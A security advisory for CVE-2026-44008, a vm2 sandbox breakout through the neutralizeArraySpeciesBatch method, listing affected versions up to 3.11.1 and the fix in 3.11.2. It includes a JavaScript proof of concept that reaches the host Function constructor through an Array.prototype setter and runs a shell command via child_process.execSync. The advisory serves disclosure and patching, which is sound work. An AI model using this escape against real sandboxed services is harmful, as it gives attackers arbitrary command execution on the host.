CVE-2026-44008: vm2 Sandbox Breakout via `neutralizeArraySpeciesBatch`
GHSA-9qj6-qjgg-37qq
CVE-2026-44008
Summary
A vulnerability in vm2 allows attackers to break out of the sandbox and execute arbitrary commands on the host system. The precondition is that the attacker can already run code inside the vm2 sandbox. To protect yourself, update to the latest version of vm2 and be cautious about running untrusted code in a sandbox.
What to do
- Update GitHub Actions vm2 to version 3.11.2.
- Update vm2 to version 3.11.2.
Affected software
| Ecosystem | Vendor | Product | Affected versions |
|---|---|---|---|
| npm | GitHub Actions | vm2 | <= 3.11.1 (fix: upgrade to 3.11.2) |
| npm | – | vm2 | <= 3.11.1 (fix: upgrade to 3.11.2) |
Original title
vm2 has sandbox breakout via `neutralizeArraySpeciesBatch`
Original description
### Summary
VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.
### Details
The new method `neutralizeArraySpeciesBatch` works with objects from the other side of the sandbox boundary, but it can call back into this side via a getter on the array prototype, which exposes objects of the wrong side into the sandbox. This can be used to obtain host objects and, from them, the host `Function` object.
### PoC
```js
const {VM} = require("vm2");
const vm = new VM();
console.log(vm.run(`
  const a = [];
  Object.defineProperty(Array.prototype, 0, {
    set(value) {
      a.f = Buffer.prototype.inspect;
      value.arr.f.constructor.constructor("return process")().mainModule.require('child_process').execSync('touch pwned');
    }
  });
  new Buffer(a);
`));
```
### Impact
Attackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox.
CVSS 3.1 (GHSA): 9.8
Vulnerability type: CWE-668
Published: 8 May 2026 · Updated: 28 May 2026 · First seen: 8 May 2026